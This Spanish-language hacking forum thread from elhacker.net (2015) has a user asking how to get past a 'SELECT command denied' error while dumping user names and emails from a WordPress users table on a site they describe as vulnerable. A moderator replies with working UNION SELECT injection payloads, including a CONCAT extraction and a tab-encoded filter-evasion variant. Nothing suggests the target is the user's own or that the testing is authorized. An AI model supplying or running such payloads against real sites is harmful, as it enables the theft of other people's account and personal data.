elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Security Series.XSS. [Cross Site Scripting]


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  El fin de la SQLi
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: El fin de la SQLi  (Leído 2,140 veces)
bytefloat

Desconectado Desconectado

Mensajes: 5


Ver Perfil
El fin de la SQLi
« en: 13 Febrero 2015, 18:31 pm »

Hola, soy bytefloat, el fin de una sql injection se presenta cuando..?

Código:
SELECT command denied to user 'www'@'localhost' for table 'tables'

Si ya sé cuantas tablas hay, el nombre de ellas, las columnas de una en específico, y al momento de conseguir el id=1 de una tabla me presenta aquel error, no hay nada que hacer?
Código:
-1/+union+select+1,unhex(hex(notice_id)),3,4,5,6,7,8,9,10+from+wp_users.tables+limit+1,1--

Saludos :D
En línea

Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.710


WOS & Khan & Calero LDN


Ver Perfil WWW
Re: El fin de la SQLi
« Respuesta #1 en: 13 Febrero 2015, 19:41 pm »

No entendi lo que quieres preguntar.
En línea

Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.
bytefloat

Desconectado Desconectado

Mensajes: 5


Ver Perfil
Re: El fin de la SQLi
« Respuesta #2 en: 13 Febrero 2015, 20:33 pm »

Claro, tenía cierta página la cual es vulnerable a sqli, por lo que proseguí a sacar el nombre de las tablas dentro de ellas, columnas, etc .. , hasta que llegue a la tabla de "users", la cual quise investigar dentro más de ella, saque que su primer columna es "users", su segunda es "mail", sólo me interesan estas, entonces quiero sacar el users y mail del id=1 , pero al hacerlo me manda el siguiente error intentando con el siguiente código:
Código:
php?id=-1+union+select+1,unhex(hex(users)),3,4,5,6,7,8,9,10+from+wp_users.tables+limit+1,1--

Código:
SELECT command denied to user 'www'@'localhost' for table 'tables'

Y no puedo saber el usuario..
Si no se me entiende, supongamos que quiero sacar user y pass de la tabla wp_users la cual ya sé sus columnas, pero que al momento de hacer un select a los usuarios no me deja

Saludos
En línea

Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.710


WOS & Khan & Calero LDN


Ver Perfil WWW
Re: El fin de la SQLi
« Respuesta #3 en: 13 Febrero 2015, 21:12 pm »

Es como si no tuviera permisos para realizar un SELECT, pero no se estaraís haciendo, pero si me dices que ya sabes cual tabla es, los campos de la tabla, y ahora quieres mirar el registro.

Sería algo como esto:
Código
  1. -1/+UNION+ALL+SELECT+1,CONCAT(users, ':', mail),3,4,5,6,7,8,9,10+FROM+wp_users+LIMIT+1,1--

PD: Te envie un M.P!

-- EDIT ----------------------------------------------------------
No se como estaras haciendo pero mal!
Código
  1. -1%09UNION%09ALL%09SELECT%091,usuario,3,4,5,6,7,8,9,0%09FROM%09usuarios--
« Última modificación: 13 Febrero 2015, 22:29 pm por Shell Root » En línea

Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
SQLI en MS Acces
Nivel Web
Nork 3 2,322 Último mensaje 4 Mayo 2009, 13:48 pm
por Nork
GiE 4.8 - SQLi
Nivel Web
Pony-Magic 4 5,618 Último mensaje 17 Diciembre 2010, 14:37 pm
por xassiz~
SQLi
Nivel Web
hache1989 2 1,997 Último mensaje 18 Diciembre 2012, 06:15 am
por dRak0
[Ruby] SQLI Scanner 0.4
Scripting
BigBear 0 980 Último mensaje 7 Agosto 2015, 22:25 pm
por BigBear
¿Sqli directo o Wordpress?
Bugs y Exploits
Svlly 3 1,700 Último mensaje 4 Enero 2017, 19:28 pm
por #!drvy
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines